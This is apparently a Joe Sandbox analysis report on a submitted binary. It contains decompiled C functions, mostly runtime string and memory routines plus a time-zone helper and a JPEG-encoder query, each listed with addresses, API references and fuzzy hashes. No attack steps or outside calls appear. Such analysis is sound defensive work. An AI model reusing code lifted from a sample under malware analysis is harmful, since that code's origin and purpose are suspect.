                                                                                0x00000000
                                                                                0x00417c22
                                                                                0x00417c02
                                                                                0x00000000
                                                                                0x00417c02
                                                                                0x00000000

                                                                                APIs
                                                                                • GdipGetImageEncodersSize.GDIPLUS(?,00417D1A,00000000,?,00417D1A,?,?,?,?,?,?,?,00417D99), ref: 00417BE2
                                                                                • _malloc.LIBCMT ref: 00417BF6
                                                                                • _free.LIBCMT ref: 00417C7B
                                                                                  • Part of subcall function 0041E008: HeapFree.KERNEL32(00000000,00000000,?,00427B57,00000000,?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 0041E01E
                                                                                  • Part of subcall function 0041E008: GetLastError.KERNEL32(00000000,?,00427B57,00000000,?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 0041E030
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EncodersErrorFreeGdipHeapImageLastSize_free_malloc
                                                                                • String ID: image/jpeg
                                                                                • API String ID: 34177290-3785015651
                                                                                • Opcode ID: 93ef848b1ee1ea328e2a5295c08d0db9a415a871f46c76584b979af90b840b7a
                                                                                • Instruction ID: 319453ee1547e7f9947a87b58f72116eefa2af3bf3731a6e6d63df9ed313092e
                                                                                • Opcode Fuzzy Hash: 93ef848b1ee1ea328e2a5295c08d0db9a415a871f46c76584b979af90b840b7a
                                                                                • Instruction Fuzzy Hash: C7219272D08524ABCB119F64C9C44EEBB75FF25764B610297F821A7390E7369F81C6C8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040D601(signed int __eax, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4) {
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				intOrPtr _t14;
                                                                                				intOrPtr _t17;
                                                                                				intOrPtr* _t18;
                                                                                				intOrPtr* _t21;
                                                                                				intOrPtr* _t23;
                                                                                				intOrPtr* _t24;
                                                                                				intOrPtr _t28;
                                                                                				signed int _t31;
                                                                                				intOrPtr* _t35;
                                                                                				void* _t36;
                                                                                				intOrPtr* _t37;
                                                                                				void* _t38;
                                                                                
                                                                                				_t38 = __ebp;
                                                                                				_t36 = __edi;
                                                                                				_t27 = _a4;
                                                                                				_t37 = __eax;
                                                                                				_t31 = __eax;
                                                                                				if(E00403D0E(__eax, _a4) == 0) {
                                                                                					_t14 =  *((intOrPtr*)(_t37 + 0x10));
                                                                                					if((_t31 | 0xffffffff) - _t14 <= __edi) {
                                                                                						_t14 = E0041D3B9("string too long");
                                                                                					}
                                                                                					if(_t36 != 0) {
                                                                                						_t28 = _t14 + _t36;
                                                                                						if(E00403CAC(_t28, _t37, _t36, _t38, _t28, 0) != 0) {
                                                                                							_t17 =  *((intOrPtr*)(_t37 + 0x14));
                                                                                							if(_t17 < 0x10) {
                                                                                								_t35 = _t37;
                                                                                							} else {
                                                                                								_t35 =  *_t37;
                                                                                							}
                                                                                							if(_t17 < 0x10) {
                                                                                								_t18 = _t37;
                                                                                							} else {
                                                                                								_t18 =  *_t37;
                                                                                							}
                                                                                							E0041E250(_t18 + _t36, _t35,  *((intOrPtr*)(_t37 + 0x10)));
                                                                                							if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                                								_t21 = _t37;
                                                                                							} else {
                                                                                								_t21 =  *_t37;
                                                                                							}
                                                                                							E00421230(_t21, _a4, _t36);
                                                                                							 *((intOrPtr*)(_t37 + 0x10)) = _t28;
                                                                                							if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                                								_t23 = _t37;
                                                                                							} else {
                                                                                								_t23 =  *_t37;
                                                                                							}
                                                                                							 *((char*)(_t23 + _t28)) = 0;
                                                                                						}
                                                                                					}
                                                                                					return _t37;
                                                                                				}
                                                                                				if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                                					_t24 = _t37;
                                                                                				} else {
                                                                                					_t24 =  *_t37;
                                                                                				}
                                                                                				return L0040D508(_t36, _t37, _t31, _t36, _t37, _t27 - _t24);
                                                                                			}

















                                                                                0x0040d601
                                                                                0x0040d601
                                                                                0x0040d602
                                                                                0x0040d607
                                                                                0x0040d60a
                                                                                0x0040d613
                                                                                0x0040d632
                                                                                0x0040d63c
                                                                                0x0040d643
                                                                                0x0040d643
                                                                                0x0040d64a
                                                                                0x0040d64c
                                                                                0x0040d65b
                                                                                0x0040d65d
                                                                                0x0040d663
                                                                                0x0040d669
                                                                                0x0040d665
                                                                                0x0040d665
                                                                                0x0040d665
                                                                                0x0040d66e
                                                                                0x0040d674
                                                                                0x0040d670
                                                                                0x0040d670
                                                                                0x0040d670
                                                                                0x0040d67d
                                                                                0x0040d689
                                                                                0x0040d68f
                                                                                0x0040d68b
                                                                                0x0040d68b
                                                                                0x0040d68b
                                                                                0x0040d697
                                                                                0x0040d6a3
                                                                                0x0040d6a6
                                                                                0x0040d6ac
                                                                                0x0040d6a8
                                                                                0x0040d6a8
                                                                                0x0040d6a8
                                                                                0x0040d6ae
                                                                                0x0040d6ae
                                                                                0x0040d65b
                                                                                0x00000000
                                                                                0x0040d6b2
                                                                                0x0040d619
                                                                                0x0040d61f
                                                                                0x0040d61b
                                                                                0x0040d61b
                                                                                0x0040d61b
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove$Xinvalid_argumentstd::_
                                                                                • String ID: invalid string position$string too long
                                                                                • API String ID: 1771113911-4289949731
                                                                                • Opcode ID: fd0c51239c597e2d3d7871c880ba0d3e4328b44ca0266aa066e1e2eab5dda1f2
                                                                                • Instruction ID: eba0b8a39537324adec1d49bf4182e6b67c73c1e00a74bcbd8c27bc61cbd5b75
                                                                                • Opcode Fuzzy Hash: fd0c51239c597e2d3d7871c880ba0d3e4328b44ca0266aa066e1e2eab5dda1f2
                                                                                • Instruction Fuzzy Hash: B211D870B0071087DA349E9D8994926B7E5EF45704B100D3FF48AE72C2C73E9C88875E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0041F811() {
                                                                                				intOrPtr _t5;
                                                                                				intOrPtr _t6;
                                                                                				intOrPtr _t10;
                                                                                				void* _t12;
                                                                                				intOrPtr _t15;
                                                                                				intOrPtr* _t16;
                                                                                				signed int _t19;
                                                                                				signed int _t20;
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr _t27;
                                                                                
                                                                                				_t5 =  *0x44bdc0;
                                                                                				_t26 = 0x14;
                                                                                				if(_t5 != 0) {
                                                                                					if(_t5 < _t26) {
                                                                                						_t5 = _t26;
                                                                                						goto L4;
                                                                                					}
                                                                                				} else {
                                                                                					_t5 = 0x200;
                                                                                					L4:
                                                                                					 *0x44bdc0 = _t5;
                                                                                				}
                                                                                				_t6 = E0042303F(_t5, 4);
                                                                                				 *0x44ada0 = _t6;
                                                                                				if(_t6 != 0) {
                                                                                					L8:
                                                                                					_t19 = 0;
                                                                                					_t15 = 0x4471e0;
                                                                                					while(1) {
                                                                                						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                                                                                						_t15 = _t15 + 0x20;
                                                                                						_t19 = _t19 + 4;
                                                                                						if(_t15 >= 0x447460) {
                                                                                							break;
                                                                                						}
                                                                                						_t6 =  *0x44ada0; // 0x37b21b8
                                                                                					}
                                                                                					_t27 = 0xfffffffe;
                                                                                					_t20 = 0;
                                                                                					_t16 = 0x4471f0;
                                                                                					do {
                                                                                						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x44ac80 + (_t20 >> 5) * 4))));
                                                                                						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                                                                                							 *_t16 = _t27;
                                                                                						}
                                                                                						_t16 = _t16 + 0x20;
                                                                                						_t20 = _t20 + 1;
                                                                                					} while (_t16 < 0x447250);
                                                                                					return 0;
                                                                                				} else {
                                                                                					 *0x44bdc0 = _t26;
                                                                                					_t6 = E0042303F(_t26, 4);
                                                                                					 *0x44ada0 = _t6;
                                                                                					if(_t6 != 0) {
                                                                                						goto L8;
                                                                                					} else {
                                                                                						_t12 = 0x1a;
                                                                                						return _t12;
                                                                                					}
                                                                                				}
                                                                                			}













                                                                                0x0041f811
                                                                                0x0041f819
                                                                                0x0041f81c
                                                                                0x0041f827
                                                                                0x0041f829
                                                                                0x00000000
                                                                                0x0041f829
                                                                                0x0041f81e
                                                                                0x0041f81e
                                                                                0x0041f82b
                                                                                0x0041f82b
                                                                                0x0041f82b
                                                                                0x0041f833
                                                                                0x0041f83a
                                                                                0x0041f841
                                                                                0x0041f861
                                                                                0x0041f861
                                                                                0x0041f863
                                                                                0x0041f86f
                                                                                0x0041f86f
                                                                                0x0041f872
                                                                                0x0041f875
                                                                                0x0041f87e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041f86a
                                                                                0x0041f86a
                                                                                0x0041f882
                                                                                0x0041f883
                                                                                0x0041f885
                                                                                0x0041f88b
                                                                                0x0041f89f
                                                                                0x0041f8a5
                                                                                0x0041f8af
                                                                                0x0041f8af
                                                                                0x0041f8b1
                                                                                0x0041f8b4
                                                                                0x0041f8b5
                                                                                0x0041f8c1
                                                                                0x0041f843
                                                                                0x0041f846
                                                                                0x0041f84c
                                                                                0x0041f853
                                                                                0x0041f85a
                                                                                0x00000000
                                                                                0x0041f85c
                                                                                0x0041f85e
                                                                                0x0041f860
                                                                                0x0041f860
                                                                                0x0041f85a

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __calloc_crt
                                                                                • String ID: PrD$`tD$qD
                                                                                • API String ID: 3494438863-3543007588
                                                                                • Opcode ID: 541aa3b2d9f4d34b47e56653a53e434ce1563b1c9d8ad749c41d622ce3df60f9
                                                                                • Instruction ID: 776341e7e09287abf72e6364a62878e3ea5ebf67c7de829c0b1cecaac84c5435
                                                                                • Opcode Fuzzy Hash: 541aa3b2d9f4d34b47e56653a53e434ce1563b1c9d8ad749c41d622ce3df60f9
                                                                                • Instruction Fuzzy Hash: 0911A371B446114BF7286F2EBC406A22391FB85774B64063BE505CA3A4EB3CD883828D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040E3F4(void* __eax, signed int __ecx, intOrPtr* __edi, intOrPtr* _a4, signed int _a8) {
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t23;
                                                                                				void* _t24;
                                                                                				signed int _t25;
                                                                                				intOrPtr* _t29;
                                                                                				intOrPtr* _t32;
                                                                                				void* _t33;
                                                                                				signed int _t34;
                                                                                				intOrPtr* _t37;
                                                                                				intOrPtr* _t43;
                                                                                				signed int _t45;
                                                                                
                                                                                				_t43 = __edi;
                                                                                				_t34 = __ecx;
                                                                                				_t33 = __eax;
                                                                                				_t23 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                				if(_t23 < _a8) {
                                                                                					_t23 = E0041D406("invalid string position");
                                                                                				}
                                                                                				_t24 = _t23 - _a8;
                                                                                				if(_t24 < _t33) {
                                                                                					_t33 = _t24;
                                                                                				}
                                                                                				_t25 =  *(_t43 + 0x10);
                                                                                				if((_t34 | 0xffffffff) - _t25 <= _t33) {
                                                                                					_t25 = E0041D3B9("string too long");
                                                                                				}
                                                                                				if(_t33 != 0) {
                                                                                					_t45 = _t25 + _t33;
                                                                                					if(E00403AFB(_t33, _t43, _t45) != 0) {
                                                                                						_t37 = _a4;
                                                                                						if( *((intOrPtr*)(_t37 + 0x14)) >= 8) {
                                                                                							_t37 =  *_t37;
                                                                                						}
                                                                                						if( *((intOrPtr*)(_t43 + 0x14)) < 8) {
                                                                                							_t29 = _t43;
                                                                                						} else {
                                                                                							_t29 =  *_t43;
                                                                                						}
                                                                                						E00421230(_t29 +  *(_t43 + 0x10) * 2, _t37 + _a8 * 2, _t33 + _t33);
                                                                                						 *(_t43 + 0x10) = _t45;
                                                                                						if( *((intOrPtr*)(_t43 + 0x14)) < 8) {
                                                                                							_t32 = _t43;
                                                                                						} else {
                                                                                							_t32 =  *_t43;
                                                                                						}
                                                                                						 *((short*)(_t32 + _t45 * 2)) = 0;
                                                                                					}
                                                                                				}
                                                                                				return _t43;
                                                                                			}
















                                                                                0x0040e3f4
                                                                                0x0040e3f4
                                                                                0x0040e3f8
                                                                                0x0040e3fd
                                                                                0x0040e403
                                                                                0x0040e40a
                                                                                0x0040e40a
                                                                                0x0040e40f
                                                                                0x0040e414
                                                                                0x0040e416
                                                                                0x0040e416
                                                                                0x0040e418
                                                                                0x0040e422
                                                                                0x0040e429
                                                                                0x0040e429
                                                                                0x0040e430
                                                                                0x0040e433
                                                                                0x0040e43f
                                                                                0x0040e441
                                                                                0x0040e448
                                                                                0x0040e44a
                                                                                0x0040e44a
                                                                                0x0040e450
                                                                                0x0040e456
                                                                                0x0040e452
                                                                                0x0040e452
                                                                                0x0040e452
                                                                                0x0040e46a
                                                                                0x0040e476
                                                                                0x0040e479
                                                                                0x0040e47f
                                                                                0x0040e47b
                                                                                0x0040e47b
                                                                                0x0040e47b
                                                                                0x0040e483
                                                                                0x0040e483
                                                                                0x0040e487
                                                                                0x0040e48c

                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040E40A
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D41B
                                                                                  • Part of subcall function 0041D406: __CxxThrowException@8.LIBCMT ref: 0041D430
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D441
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040E429
                                                                                • _memmove.LIBCMT ref: 0040E46A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                • String ID: invalid string position$string too long
                                                                                • API String ID: 3404309857-4289949731
                                                                                • Opcode ID: 0c4569b8437b5bd8d153c09ba8feecbf81866c5aea0c74ffe760e1a588978e32
                                                                                • Instruction ID: 1aa91c2beb56532d83383d4904f4eb6cc1e0bbbf6773aa533100211ada8fd7c5
                                                                                • Opcode Fuzzy Hash: 0c4569b8437b5bd8d153c09ba8feecbf81866c5aea0c74ffe760e1a588978e32
                                                                                • Instruction Fuzzy Hash: B811E2703002059FCB08EF6AD9C085973A5BF593147504A3EF816EB292D734E965CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040D270(void* __eax, signed int __ecx, intOrPtr* __esi, intOrPtr* _a4, intOrPtr _a8) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t17;
                                                                                				void* _t18;
                                                                                				intOrPtr _t19;
                                                                                				intOrPtr* _t22;
                                                                                				intOrPtr* _t27;
                                                                                				void* _t28;
                                                                                				signed int _t29;
                                                                                				intOrPtr* _t33;
                                                                                				intOrPtr _t35;
                                                                                				intOrPtr* _t37;
                                                                                				void* _t38;
                                                                                
                                                                                				_t37 = __esi;
                                                                                				_t29 = __ecx;
                                                                                				_t28 = __eax;
                                                                                				_t17 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                				if(_t17 < _a8) {
                                                                                					_t17 = E0041D406("invalid string position");
                                                                                				}
                                                                                				_t18 = _t17 - _a8;
                                                                                				if(_t18 < _t28) {
                                                                                					_t28 = _t18;
                                                                                				}
                                                                                				_t19 =  *((intOrPtr*)(_t37 + 0x10));
                                                                                				if((_t29 | 0xffffffff) - _t19 <= _t28) {
                                                                                					_t19 = E0041D3B9("string too long");
                                                                                				}
                                                                                				if(_t28 != 0) {
                                                                                					_t35 = _t19 + _t28;
                                                                                					if(E00403CAC(_t28, _t37, _t35, _t38, _t35, 0) != 0) {
                                                                                						_t22 = _a4;
                                                                                						if( *((intOrPtr*)(_t22 + 0x14)) >= 0x10) {
                                                                                							_t22 =  *_t22;
                                                                                						}
                                                                                						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                                							_t33 = _t37;
                                                                                						} else {
                                                                                							_t33 =  *_t37;
                                                                                						}
                                                                                						E00421230( *((intOrPtr*)(_t37 + 0x10)) + _t33, _t22 + _a8, _t28);
                                                                                						 *((intOrPtr*)(_t37 + 0x10)) = _t35;
                                                                                						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                                							_t27 = _t37;
                                                                                						} else {
                                                                                							_t27 =  *_t37;
                                                                                						}
                                                                                						 *((char*)(_t27 + _t35)) = 0;
                                                                                					}
                                                                                				}
                                                                                				return _t37;
                                                                                			}

















                                                                                0x0040d270
                                                                                0x0040d270
                                                                                0x0040d274
                                                                                0x0040d279
                                                                                0x0040d27f
                                                                                0x0040d286
                                                                                0x0040d286
                                                                                0x0040d28b
                                                                                0x0040d290
                                                                                0x0040d292
                                                                                0x0040d292
                                                                                0x0040d294
                                                                                0x0040d29e
                                                                                0x0040d2a5
                                                                                0x0040d2a5
                                                                                0x0040d2ac
                                                                                0x0040d2af
                                                                                0x0040d2be
                                                                                0x0040d2c0
                                                                                0x0040d2c7
                                                                                0x0040d2c9
                                                                                0x0040d2c9
                                                                                0x0040d2cf
                                                                                0x0040d2d5
                                                                                0x0040d2d1
                                                                                0x0040d2d1
                                                                                0x0040d2d1
                                                                                0x0040d2e2
                                                                                0x0040d2ee
                                                                                0x0040d2f1
                                                                                0x0040d2f7
                                                                                0x0040d2f3
                                                                                0x0040d2f3
                                                                                0x0040d2f3
                                                                                0x0040d2f9
                                                                                0x0040d2f9
                                                                                0x0040d2fd
                                                                                0x0040d302

                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040D286
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D41B
                                                                                  • Part of subcall function 0041D406: __CxxThrowException@8.LIBCMT ref: 0041D430
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D441
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040D2A5
                                                                                • _memmove.LIBCMT ref: 0040D2E2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                • String ID: invalid string position$string too long
                                                                                • API String ID: 3404309857-4289949731
                                                                                • Opcode ID: 1521b5519d897088a0daef7712e8142c62f48b4b48fb5140800b2e8a8e419bd2
                                                                                • Instruction ID: 55d4c14f1ea96473c45b8c192cec8498876e449d4fdc252fff66dd7ee389584d
                                                                                • Opcode Fuzzy Hash: 1521b5519d897088a0daef7712e8142c62f48b4b48fb5140800b2e8a8e419bd2
                                                                                • Instruction Fuzzy Hash: B411BF31B002049FDB28DE9DC981A5AB3E4BF05704B10097EF453EB6C2D778E9488759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00418795(signed int __ecx, void* __edi, intOrPtr* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
                                                                                				void* __ebx;
                                                                                				intOrPtr _t11;
                                                                                				intOrPtr _t14;
                                                                                				intOrPtr* _t15;
                                                                                				intOrPtr* _t21;
                                                                                				intOrPtr _t23;
                                                                                				intOrPtr _t24;
                                                                                				signed int _t25;
                                                                                				intOrPtr* _t29;
                                                                                				void* _t35;
                                                                                				intOrPtr* _t36;
                                                                                				void* _t37;
                                                                                
                                                                                				_t37 = __ebp;
                                                                                				_t36 = __esi;
                                                                                				_t35 = __edi;
                                                                                				_t25 = __ecx;
                                                                                				_t23 =  *((intOrPtr*)(__esi + 0x10));
                                                                                				if(_t23 < __edi) {
                                                                                					E0041D406("invalid string position");
                                                                                				}
                                                                                				_t11 = _a4;
                                                                                				if((_t25 | 0xffffffff) - _t23 <= _t11) {
                                                                                					_t11 = E0041D3B9("string too long");
                                                                                				}
                                                                                				if(_t11 != 0) {
                                                                                					_t24 = _t23 + _t11;
                                                                                					if(E00403CAC(_t24, _t36, _t35, _t37, _t24, 0) != 0) {
                                                                                						_t14 =  *((intOrPtr*)(_t36 + 0x14));
                                                                                						if(_t14 < 0x10) {
                                                                                							_t29 = _t36;
                                                                                						} else {
                                                                                							_t29 =  *_t36;
                                                                                						}
                                                                                						if(_t14 < 0x10) {
                                                                                							_t15 = _t36;
                                                                                						} else {
                                                                                							_t15 =  *_t36;
                                                                                						}
                                                                                						E0041E250(_t15 + _t35 + _a4, _t29 + _t35,  *((intOrPtr*)(_t36 + 0x10)) - _t35);
                                                                                						E0040D305(_t36, _t35, _a8, _a4);
                                                                                						 *((intOrPtr*)(_t36 + 0x10)) = _t24;
                                                                                						if( *((intOrPtr*)(_t36 + 0x14)) < 0x10) {
                                                                                							_t21 = _t36;
                                                                                						} else {
                                                                                							_t21 =  *_t36;
                                                                                						}
                                                                                						 *((char*)(_t21 + _t24)) = 0;
                                                                                					}
                                                                                				}
                                                                                				return _t36;
                                                                                			}















                                                                                0x00418795
                                                                                0x00418795
                                                                                0x00418795
                                                                                0x00418795
                                                                                0x00418796
                                                                                0x0041879b
                                                                                0x004187a2
                                                                                0x004187a2
                                                                                0x004187a7
                                                                                0x004187b2
                                                                                0x004187b9
                                                                                0x004187b9
                                                                                0x004187c0
                                                                                0x004187c2
                                                                                0x004187d0
                                                                                0x004187d2
                                                                                0x004187d8
                                                                                0x004187de
                                                                                0x004187da
                                                                                0x004187da
                                                                                0x004187da
                                                                                0x004187e3
                                                                                0x004187e9
                                                                                0x004187e5
                                                                                0x004187e5
                                                                                0x004187e5
                                                                                0x004187fb
                                                                                0x0041880f
                                                                                0x00418818
                                                                                0x0041881b
                                                                                0x00418821
                                                                                0x0041881d
                                                                                0x0041881d
                                                                                0x0041881d
                                                                                0x00418823
                                                                                0x00418823
                                                                                0x004187d0
                                                                                0x0041882a

                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 004187A2
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D41B
                                                                                  • Part of subcall function 0041D406: __CxxThrowException@8.LIBCMT ref: 0041D430
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D441
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 004187B9
                                                                                • _memmove.LIBCMT ref: 004187FB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                • String ID: invalid string position$string too long
                                                                                • API String ID: 3404309857-4289949731
                                                                                • Opcode ID: 189e12cbdc94e9b36475dd281bfb8c942a3c5ea965e9fe000976024ad75cbfaf
                                                                                • Instruction ID: c658fdf3f1b195c0b7b146226b1abb75349fff2c768c6e029754e5bae1fd61b9
                                                                                • Opcode Fuzzy Hash: 189e12cbdc94e9b36475dd281bfb8c942a3c5ea965e9fe000976024ad75cbfaf
                                                                                • Instruction Fuzzy Hash: AC1182307046405BD625AE6DCD91AABB7E6AF80704B64091EF4E2C77C2CB78D885C79E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 32%
                                                                                			E004161E0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int __fp0) {
                                                                                				void* _t29;
                                                                                				void* _t35;
                                                                                				void* _t37;
                                                                                				void* _t42;
                                                                                				signed int* _t43;
                                                                                				void* _t45;
                                                                                
                                                                                				_t45 = __eflags;
                                                                                				_t37 = __edx;
                                                                                				_t35 = __ecx;
                                                                                				E004219DE(E00436D86, __ebx, __edi, __esi);
                                                                                				 *(_t42 - 0x108) =  *(_t42 - 0x108) & 0x00000000;
                                                                                				 *(_t42 - 0x24) = 0;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosw");
                                                                                				GetSystemTime(_t42 - 0x24);
                                                                                				GetTimeZoneInformation(_t42 - 0x104);
                                                                                				 *((short*)(_t42 - 0x34)) = 0;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosw");
                                                                                				__imp__TzSpecificLocalTimeToSystemTime(_t42 - 0x104, _t42 - 0x24, _t42 - 0x34, 0xfc);
                                                                                				_push(_t35);
                                                                                				asm("fild dword [ebp-0x104]");
                                                                                				asm("fchs");
                                                                                				 *(_t42 - 0x108) = __fp0 /  *0x442ad0;
                                                                                				 *_t43 =  *(_t42 - 0x108);
                                                                                				_push(_t42 - 0x50);
                                                                                				_t29 = E0041763D(__ebx, _t37, _t42 - 0x32, __esi, _t45);
                                                                                				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
                                                                                				E0040D3FA(_t35, __esi, "UTC", _t29);
                                                                                				E00402C34(_t42 - 0x50, 1, 0);
                                                                                				return E00421A61(__ebx, _t42 - 0x32, __esi);
                                                                                			}









                                                                                0x004161e0
                                                                                0x004161e0
                                                                                0x004161e0
                                                                                0x004161ea
                                                                                0x004161ef
                                                                                0x004161f8
                                                                                0x004161ff
                                                                                0x00416200
                                                                                0x00416201
                                                                                0x00416202
                                                                                0x00416208
                                                                                0x00416215
                                                                                0x0041621d
                                                                                0x00416224
                                                                                0x00416225
                                                                                0x00416226
                                                                                0x00416227
                                                                                0x00416238
                                                                                0x0041623e
                                                                                0x0041623f
                                                                                0x0041624e
                                                                                0x00416250
                                                                                0x0041625c
                                                                                0x0041625f
                                                                                0x00416260
                                                                                0x00416265
                                                                                0x00416270
                                                                                0x0041627f
                                                                                0x0041628b

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 004161EA
                                                                                • GetSystemTime.KERNEL32(00000001,000000FC,0040B192,00000001,00000000,00000001,00000000,00000001,00000000,?,?,?,00000000,00000001), ref: 00416208
                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000001), ref: 00416215
                                                                                • TzSpecificLocalTimeToSystemTime.KERNEL32(?,00000001,?,?,?,?,00000000,00000001), ref: 00416238
                                                                                  • Part of subcall function 0041763D: __EH_prolog3.LIBCMT ref: 00417647
